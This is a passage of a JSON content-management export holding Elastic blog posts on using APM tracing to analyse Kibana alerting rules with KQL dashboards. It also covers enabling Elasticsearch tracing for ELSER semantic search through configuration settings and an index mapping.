12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csb62aa3052a88cc83"}}},{"image":{"image":{"uid":"blt81f21bbe1d743d38","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-07-17T17:03:13.642Z","updated_at":"2023-07-17T17:03:13.642Z","content_type":"image/png","file_size":"357758","filename":"elastic-blog-2-strava.png","title":"elastic-blog-2-strava.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-17T17:32:20.679Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt81f21bbe1d743d38/64b574511511872a5f0393bd/elastic-blog-2-strava.png"},"_metadata":{"uid":"csf34ef6a785ef1aa8"},"caption_l10n":"","alt_text_l10n":"strava","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Going in depth","_metadata":{"uid":"cs43c398da66b61206"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eStrava No New Activities\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e is a simple ES Query style Kibana Rule. It is configured inside the Strava space, and it runs every minute and checks whether there is more than one new document inside the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003estrava*\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e index for the last 72 hours. If that is not the case, it will send me an email telling me to work out more. If you are interested in why I picked Strava for this and what it is, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/how-to-import-strava-data-elastic-stack\"\u003e\u003cspan style='font-size: 12pt;'\u003echeckout my blog post series\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eKibana and Elasticsearch instrumentation results in a comprehensive waterfall chart, showcasing each step chronologically. Leveraging distributed tracing technology, we can combine the different transactions into one view. Let’s delve into the waterfall graph together. I collapsed everything except the one interesting call.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs22f2c7e4b572cad2"}}},{"image":{"image":{"uid":"bltbb349e24bb3f25a9","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-07-17T17:05:02.005Z","updated_at":"2023-07-17T17:05:02.005Z","content_type":"image/png","file_size":"675168","filename":"elastic-blog-waterfall-graph.png","title":"elastic-blog-waterfall-graph.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-17T17:32:20.703Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbb349e24bb3f25a9/64b574be78402d5eebc2865e/elastic-blog-waterfall-graph.png"},"_metadata":{"uid":"cs4a1cbaab81552bdb"},"caption_l10n":"","alt_text_l10n":"waterfall graph","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0de95e60d4d22958"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the top of the waterfall is a bar that stretches over the entire duration. In this case, we can see that the execution of the rule took a total of 598 milliseconds. Dissecting it, we first have a few internal calls, where Kibana checks if a rule is ready to be run and which task it should fulfill. That’s what's happening in those \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e.kibana_alerting_cases\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Then it grabs its config and looks up a few more things. At some point further down, all preparation is done and we see something called \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ePOST /strava*/_search\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. That is the most fascinating bit.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFirst off, we see that the entire search on Elasticsearch took 6.4 milliseconds to complete. The overhead for network connectivity, sending the json, and parsing the answer is 3.6 milliseconds. You can get to that by subtracting the total of the first blue bar (6.4 milliseconds) from the total green bar (10 milliseconds). The green bar represents the call that Kibana executed. The blue bar is just what Elasticsearch is doing, from grabbing the data from the disk, to analyzing and preparing the response, to sending it.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow, the real magic comes from when we click on the green bar \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eElasticsearch: POST /strava*/_search\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. You are presented with a flyout that shows you all sorts of additional information that is collected from different labels, such as deployment name to subscription level. We will rely on those labels to create custom dashboards. The great part is that we capture the query sent to Elasticsearch in a field \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003espan.db.statement\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. If you cannot find it, that’s normal; it’s not mapped, so it’s unsearchable. You can view it in Discover and APM.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs998e802f98623344"}}},{"image":{"image":{"uid":"blt6dea966129203d2c","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-07-17T17:06:06.386Z","updated_at":"2023-07-17T17:06:06.386Z","content_type":"image/png","file_size":"263867","filename":"elastic-blog-4-discover-apm.png","title":"elastic-blog-4-discover-apm.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-17T17:32:20.727Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6dea966129203d2c/64b574fed3591c6a040e9074/elastic-blog-4-discover-apm.png"},"_metadata":{"uid":"cs5bcbf03b36075a12"},"caption_l10n":"","alt_text_l10n":"discover apm","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbd258d3a7a913919"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow that I know the query, I could investigate why it’s slow if somebody built something super advanced that just takes a huge amount of processing time. All of it without relying on slow logs or audit logs to identify this.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Dashboarding time","_metadata":{"uid":"cs3c34db95dab8b448"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eExamining a single rule at a specific time can be interesting to really dig into what is going on and understand the underlying fundamentals. Having a generalized view will help identify issues at scale. We will build this generalized view together.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd8aae91b100d7bca"}}},{"image":{"image":{"uid":"blt806c891fd4d9b5d3","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-07-17T17:06:51.944Z","updated_at":"2023-07-17T17:06:51.944Z","content_type":"image/png","file_size":"4289385","filename":"elastic-blog-5-graphs.png","title":"elastic-blog-5-graphs.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-17T17:32:20.752Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt806c891fd4d9b5d3/64b5752bdb581dd8b1060038/elastic-blog-5-graphs.png"},"_metadata":{"uid":"csfabcd3ab3a50ae00"},"caption_l10n":"","alt_text_l10n":"different graph views","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csdfa35b8c816c48b2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFrom the top left to the bottom right, we have a unique and summarized view of what is going on. The first chart I recommend building is a simple success versus failure over time. Assuming you have a data view that catches all the APM data (traces-apm*, metrics-apm.*, logs-apm.*), we can speed up certain visualizations by leveraging the constant_keyword feature for the data_stream. Most of the visualizations are built on the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etraces-apm*\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, so the first part of the KQL filter is \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003edata_stream.type: traces\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. The second part is the transaction.type, as we selected in the UI \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etask-run\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e at the beginning. We need to append this to the KQL as well, so it’s already \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003edata_stream.type: “traces” AND transaction.type: “task-run”\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. In KQL, there is no need to write the boolean operators such as AND and OR in capital letters. It’s my preference when quickly scanning longer KQLs to see what is searched on. The last one, and here is where the labels come in, is the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003elabels.alerting_rule_consumer: “*”\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. Many different things also happen under the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etask-run\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and we focus on alerting rules in this blog post. Therefore our full KQL is this:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd505160d7fffc742"}}},{"code":{"code":"data_stream.type: \"traces\" AND transaction.type: \"task-run\" AND labels.alerting_rule_consumer: \"*\" ","_metadata":{"uid":"cs8fe324bef4f6d593"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs65ecd6ed62a291c9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThen we add a simple date_histogram for \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003e@timestamp\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, a count of records, and a breakdown using filters with \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eevent.outcome: “success”\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e for ok and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eevent.outcome: (“failure” OR “unknown”)\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. You might wonder where the \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003eunknown\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e comes from — it’s part of the Elastic Common Schema (ECS) definition for this \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/ecs/current/ecs-allowed-values-event-outcome.html\"\u003e\u003cspan style='font-size: 12pt;'\u003efield\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs72ed54344fb697d7"}}},{"image":{"image":{"uid":"blt41695e0492537642","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2023-07-17T17:09:20.272Z","updated_at":"2023-07-17T17:09:20.272Z","content_type":"image/png","file_size":"494196","filename":"elastic-blog-6-ecs.png","title":"elastic-blog-6-ecs.png","ACL":{},"_version":1,"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-07-17T17:32:20.776Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt41695e0492537642/64b575c03d598ced49044fff/elastic-blog-6-ecs.png"},"_metadata":{"uid":"cs44a89fb7e45dcbb8"},"caption_l10n":"","alt_text_l10n":"ecs","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs32b4c3e0d4c68350"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe rest is iterating over different fields. The most important ones are:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTransaction.duration.us map in the data view using the formatter as duration using the Microseconds. This will then always turn it into human-readable numbers such as seconds, minutes, hours, and so on.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLabels.alerting_rule_type_id explains what kind of rule. Threshold, Geo Containment, ES Query, etc.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eService.version represents the version of the service. If you use service.name as a filter, you can grab what versions of Kibana you are running. This can be useful when debugging slow alerts.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHttp.response.status_code represents the status code reported by Elasticsearch to Kibana. Anything that is not 2xx does not automatically mean that the rule run resulted in a failure because there are multiple retry mechanisms configured.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003elabels.deploymentName carries the name of the deployment you are observing. This is quite useful to identify if certain deployments have more alerting rules than others.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLabels.alerting_rule_space_id represents the space in which the rule is running. This is quite useful in identifying usage patterns. Some teams might be using rules more heavily than others.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eError.exception.type contains a summarized view of the error message. Attention: this is now inside the logs-apm.error* datastream. The KQL looks slightly different: \u003cspan data-type='inlineCode'\u003edata_stream.type: \"logs\" AND data_stream.dataset: \"apm.error\" and service.name: \"kibana\" AND transaction.type: \"task-run\"\u003c/span\u003e.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Summary","_metadata":{"uid":"cs0bdcc71b0a80362b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIn this blog, we went through a journey to identify and deal with the intricacies of Kibana Alerting. The dashboards are available \u003c/span\u003e\u003ca href=\"https://github.com/philippkahr/blogs/tree/main/apm-instrumentation-of-elastic-stack/kibana-alerts\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehere\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003cbr/\u003e\u003c/span\u003e\u003cbr/\u003e\u003cspan style=\"font-size: 12pt;\"\u003eReady to get started? Begin a \u003c/span\u003e\u003ca href=\"http://cloud.elastic.co/registration\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003efree 14-day trial of Elastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Or\u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/downloads/\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edownload\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003e \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethe self-managed version of the Elastic Stack for free.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"","_metadata":{"uid":"cs6508459b286809ae"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2f1160c63d3724aa"}}}],"publish_date":"2023-07-17","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt8b37b4b3ec0fe838","ACL":{},"created_at":"2020-06-17T03:36:06.107Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"kibana","label_l10n":"Kibana","tags":[],"title":"Kibana","updated_at":"2020-06-17T03:36:06.107Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.315Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc2c6579373c53341","ACL":{},"created_at":"2021-07-12T21:53:13.753Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"apm","label_l10n":"APM","tags":[],"title":"APM","updated_at":"2021-07-12T21:53:13.753Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.194Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt76a8a9e2ae891569","ACL":{},"created_at":"2023-11-06T21:35:06.844Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"tracing","label_l10n":"Tracing","tags":[],"title":"Tracing","updated_at":"2023-11-06T21:35:06.844Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.748Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"_version":1,"is_dir":false,"uid":"blt90cabe73a33ae01c","ACL":{},"content_type":"image/png","created_at":"2020-06-29T22:11:27.126Z","created_by":"bltf6ab93733e4e3a73","file_size":"32746","filename":"blog-thumb-search-results-dark-blue.png","tags":[],"title":"blog-thumb-search-results-dark-blue.png","updated_at":"2020-06-29T22:11:27.126Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-20T18:32:38.373Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt90cabe73a33ae01c/5efa670fbc5b9a33310a9d69/blog-thumb-search-results-dark-blue.png"},"title":"How to activate APM in Kibana and Elasticsearch to gain next-level alerting insights","title_l10n":"How to activate APM in Kibana and Elasticsearch to gain next-level alerting insights","updated_at":"2025-01-21T22:43:11.265Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/apm-kibana-elasticsearch-alerting-insights","publish_details":{"time":"2025-01-21T22:43:17.232Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt7a102ec77fde3f81","_version":17,"locale":"en-us","ACL":{},"abstract_l10n":"Uncover the power of Elasticsearch tracing and optimize your APM with insights into query times, bulk indexing, and machine learning impacts. Master semantic search and enhance performance for data-driven decisions.","author":["bltfb64482fc825a009"],"category":["blte5cc8450a098ce5e"],"created_at":"2023-08-09T13:06:04.413Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"callout":{"title_l10n":"","_metadata":{"uid":"csda9466377363c0af"},"paragraph_l10n":"","callout_reference":["bltbce8bba79c5e743a"],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csce4670b5a95f908a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eA while ago, we introduced instrumentation inside Elasticsearch\u003c/span\u003e\u003cspan style=\"font-size: 0.6em;\"\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, allowing you to identify what it’s doing under the hood. By tracing in Elasticsearch, we get never-before-seen insights.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis blog walks you through the various APIs and transactions when we want to leverage the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/may-2023-launch-sparse-encoder-ai-model\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Learned Sparse EncodeR (ELSER) model\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u0026nbsp;for semantic search. This blog itself can be applied to any machine learning model running inside of Elasticsearch — you just need to alter the commands and searches accordingly. The instructions in this guide use our sparse encoder model (see \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/semantic-search-elser.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003edocs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e page).\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor the following tests, our data corpus is the \u003c/span\u003e\u003ca href=\"https://paperswithcode.com/dataset/openwebtext\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOpenWebText\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, which provides roughly 40GB of pure text and roughly 8 million individual documents. This setup runs locally on a M1 Max Macbook with 32GB RAM. Any of the following transaction durations, query times, and other parameters are only applicable to this blog post. No inferences should be drawn to production usage or your installation.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Getting started","_metadata":{"uid":"cs3ba2367f46073797"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eActivating tracing in Elasticsearch is done with static settings (configured in \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch.yml\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e) and dynamic settings, which can be toggled during runtime using a \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003ePUT _cluster/settings\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e command (one of those dynamic settings is the sampling rate). Some settings can be toggled during the runtime like the sampling rate. In the \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch.yml\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e, we want to set the following:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eVersion 9.x\u003c/span\u003e\u003c/p\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs42f4d34f74311ecc"}}},{"code":{"code":"telemetry.agent.enabled: true\ntelemetry.agent.server_url: \"url of the APM server\"","_metadata":{"uid":"cs2018e8050f226381"}}},{"title_text":{"title_text":[{"title_l10n":"","header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eVersion 7.x and 8.x\u003c/span\u003e\u003c/p\u003e","_metadata":{"uid":"cs44cbe509e2a0e0cb"}}],"_metadata":{"uid":"cs6e13d5f20d37b667"}}},{"code":{"code":"tracing.apm.enabled: true\ntracing.apm.agent.server_url: \"url of the APM server\"","_metadata":{"uid":"cs48e9523e88d17d03"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs31d2f4312c68b488"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eThe secret token (or API key) must be in the Elasticsearch keystore. The keystore tool should be available in \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e\u003cstrong\u003e\u0026lt;your elasticsearch install directory\u0026gt;/bin/elasticsearch-keystore\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e using the following command for Version 7.x and 8.x:\u003c/span\u003e \u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003eelasticsearch-keystore add tracing.apm.secret_token\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e or \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cspan data-type='inlineCode'\u003etracing.apm.api_key\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003eFor version 9.x please use \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etelemetry.secret_token\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e or \u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003etelemetry.api_key\u003c/span\u003e\u003c/span\u003e\u003cspan style='color:rgb(29, 28, 29);font-size: 12pt;'\u003e instead. \u003c/span\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eAfter that, you need to restart your Elasticsearch. More information on tracing can be found in our \u003c/span\u003e\u003ca href=\"https://github.com/elastic/elasticsearch/blob/main/TRACING.md\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003etracing document\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOnce this is activated, we can look in our APM view where we can see that Elasticsearch captures various API endpoints automatically. GET, POST, PUT, DELETE calls. With that sorted out, let us create the index:\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs544f1ce3084b5d5c"}}},{"code":{"code":"PUT openwebtext-analyzed\n{\n \"settings\": {\n \"number_of_replicas\": 0,\n \"number_of_shards\": 1,\n \"index\": {\n \"default_pipeline\": \"openwebtext\"\n }\n },\n \"mappings\": {\n \"properties\": {\n \"ml.tokens\": {\n \"type\": \"rank_features\"\n },\n \"text\": {\n \"type\": \"text\",\n \"analyzer\": \"english\"\n }\n }\n }\n}","_metadata":{"uid":"csd7a70ce53679c7b3"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs22ae94e1523fd32b"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis should give us a single transaction called \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ePUT /{index}\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. As we can see, a lot is 